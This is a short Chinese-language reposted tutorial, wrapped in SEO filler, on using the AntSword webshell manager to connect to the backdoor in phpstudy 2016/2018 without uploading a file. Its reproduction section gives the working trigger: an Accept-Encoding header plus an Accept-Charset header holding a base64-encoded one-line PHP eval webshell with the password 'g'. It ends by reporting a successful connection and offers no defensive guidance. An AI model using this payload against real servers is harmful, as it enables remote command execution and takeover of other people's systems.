龙空技术网

利用中国蚁剑无文件连接phpstudy后门方法

信息安全搬运工 446

前言:

现时朋友们对“phpstudy域名重定向无法找到信息”大致比较关怀,同学们都想要知道一些“phpstudy域名重定向无法找到信息”的相关知识。那么小编同时在网络上收集了一些关于“phpstudy域名重定向无法找到信息””的相关资讯,希望各位老铁们能喜欢,朋友们快快来了解一下吧!

0x01描述

Phpstudy是一款PHP调试环境的程序集成包,集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款软件一次性安装,无需配置,即装即用。由于其免费且方便的特性,在国内有着近百万的PHP语言学习者、开发者用户。

后门名称:Phpstudy后门

威胁等级:严重

影响范围:Phpstudy 2016、phpstudy2018

后门类型:C&C、命令执行

利用难度:极易

0x02复现

利用工具:中国蚁剑

phpstudy:2016 PHP-5.4.45

Accept-Encoding:gzip,deflateAccept-Charset:base64加密执行的命令一句话木马:ZXZhbCgkX1BPU1RbZ10pOw== 密码:g

配置HTTP消息头

连接成功

标签: #phpstudy域名重定向无法找到信息